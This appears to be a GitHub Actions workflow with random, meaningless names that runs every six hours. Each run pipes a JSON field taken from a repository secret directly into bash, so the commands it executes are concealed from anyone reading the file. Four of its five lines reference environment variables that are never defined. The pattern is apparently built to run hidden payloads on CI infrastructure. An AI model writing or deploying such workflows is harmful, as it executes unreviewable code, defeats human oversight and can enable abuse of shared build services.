name: qidiyun6453

on:
  workflow_dispatch:
  schedule:
    - cron: '3 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qidiyun6453
        env:
          iqhas5: ${{ secrets.iqhas5 }}
        run: |
          echo $iqhas5 | jq -r .mc9 | /bin/bash
          echo $hup93674 | jq -r .wy256 | /bin/bash
          echo $lmj49 | jq -r .pu78045 | /bin/bash
          echo $m10 | jq -r .gvbq675 | /bin/bash
          echo $gdy6569 | jq -r .zzko8 | /bin/bash

